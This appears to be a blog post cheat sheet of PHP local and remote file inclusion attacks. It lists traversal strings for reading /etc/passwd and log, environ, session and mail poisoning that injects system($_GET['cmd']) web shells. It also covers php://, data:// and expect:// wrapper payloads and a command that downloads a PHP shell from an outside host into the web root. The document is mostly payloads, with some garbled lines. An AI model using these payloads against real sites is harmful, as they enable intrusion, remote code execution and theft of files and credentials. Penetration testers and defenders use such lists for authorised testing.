File Inclusion LFI/RFI

Local File Inclusion

?file=../../../../etc/passwd

?file=../../../../etc/passwd%00

?file=../../../../etc/passwd%00jpg

Environment File

/proc/self/environ

Payloads:

User-Agent: <?php system($_GET[‘cmd’]); ?>

?page=/proc/self/environ&cmd=ls

?page=/proc/self/environ&cmd=python –c ‘shell…’

Apache Logs

/var/log/apache2/access.log

../../../../var/log/apache/error.log

Payload

GET /<?php system($_GET[‘cmd’]);?>

SSH Logs

/var/log/auth.log

Payload

ssh <? php system($_GET[‘cmd’]);?>@VICTIM-IM

Sending emails

Mail –s “This is email subject: <?php system($_GET[‘cmd’]);?>” user@domain < /dev/null

Include: /var/mail/user

Php://filter

Index + Index.php

?file=php://filter/read=convert.base64-encode/resource=FILETOREAD

?file=php://filter/read=convert.base64-encode/resource=../../config.php

Php://input

?file=php://input

With post data

<?php system(‘wget http://x.x.x.x/php-shell.php -O /var/www/html/shell.php’); ?>

<?php phpinfo(); ?>

data://

?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA2fPg%3d%3d

?file=data:text/plain;,<?php echo shell_exec($_GET[‘cmd’]);?>

zip://

zip://archive.zip#file.php

phar://

/proc/self/fd/#

 

Session Files

/tmp/SeSS ID

/tmp/php5/SessID

Including images

You can append some php code at the end of an image and upload it or include it.

Use encoding

?file=..%2F..%2F..%2F..%2F..%2Fetc/passwd

?file=….//….//….//….//….//etc/passwd

Expect

?file=expect://ls

Note: Null byte injection has been fixed in PHP 5.3.4 (unsupported).

To bypass Null byte fix, make file path bigger than 4096, path truncation vulnerability

?file=../../../etc/passwd/./././././thousand times (./)

Or Reverse Path truncation vulnerability

?file=../../../../(thousand times ./)etc/passwd

Proc File System

/proc/sched_debug // find pid

/proc/mounts

/proc/net/arp

/proc/net/route

/proc/net/tcp  and /proc/net/udp

/proc/net/fib_trie

/proc/version

Query process

/proc/[PID]/cmdline

/proc/[PID]/environ

/proc/[PID]/cwd

/proc/[PID]/fd/[#]  // find error, access log files

 

/proc/self/cmdline

/proc/self/stat

/proc/self/status

/proc/self/fd/[#]

RFI

?file=[http|https|ftp]://websec.wordpress.com/shell.txt

(requires allow_url_fopen=On and allow_url_include=On)

Files to check

https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion%20-%20Path%20Traversal/Intruders/List_Of_File_To_Include.txt

https://raw.githubusercontent.com/tennc/fuzzdb/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt

https://raw.githubusercontent.com/D35m0nd142/LFISuite/master/pathtotest.txt

https://github.com/D35m0nd142/LFISuite/blob/master/pathtotest_huge.txt

Windows File Check

https://raw.githubusercontent.com/tennc/fuzzdb/master/dict/BURP-PayLoad/LFI/LFI-WinblowsFileCheck.txt

Payloads for File Inclusion

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal

https://github.com/swisskyrepo/PayloadsAllTheThings

References:

https://resources.infosecinstitute.com/local-file-inclusion-code-execution/

https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1

http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/

https://rawsec.ml/en/local-file-inclusion-remote-code-execution-vulnerability/

http://www.securityidiots.com/Web-Pentest/LFI/

http://www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html

https://www.slideshare.net/null0x00/lfi-to-rce

https://www.sunnyhoi.com/how-to-hack-a-website-using-local-file-inclusion-lfi/

https://hydrasky.com/network-security/local-file-inclusion-sending-emails-to-remote-code-execution/

https://security.stackexchange.com/questions/136730/local-file-inclusion-to-rce-using-php-file-wrappers

https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601

https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/

https://www.autosectools.com/Local-File-Inclusion-To-Remote-Code-Execution

https://www.codemetrix.net/php-local-file-includes-into-remote/

https://www.notsosecure.com/lfi-code-exec-remote-root/

https://resources.infosecinstitute.com/file-inclusion-attacks/

https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion

https://securityxploded.com/remote-file-inclusion.php

https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/

https://null-byte.wonderhowto.com/how-to/exploit-php-file-inclusion-web-apps-0179955/

https://www.getastra.com/blog/cms/your-guide-to-defending-against-lfi-and-rfi-attacks/

https://www.cybrary.it/0p3n/local-file-inclusion-command-execution/

https://en.wikipedia.org/wiki/File_inclusion_vulnerability

https://www.imperva.com/docs/hii_remote_and_local_file_inclusion_vulnerabilities.pdf

https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

https://xapax.gitbooks.io/security/content/local_file_inclusion.html

https://highon.coffee/blog/lfi-cheat-sheet/

http://securityidiots.com/Web-Pentest/LFI

https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

https://nets.ec/File_Inclusion

https://gist.github.com/sckalath/da1a232f362a700ab459

https://evi1us3r.wordpress.com/lfi-cheat-sheet/

http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf

https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s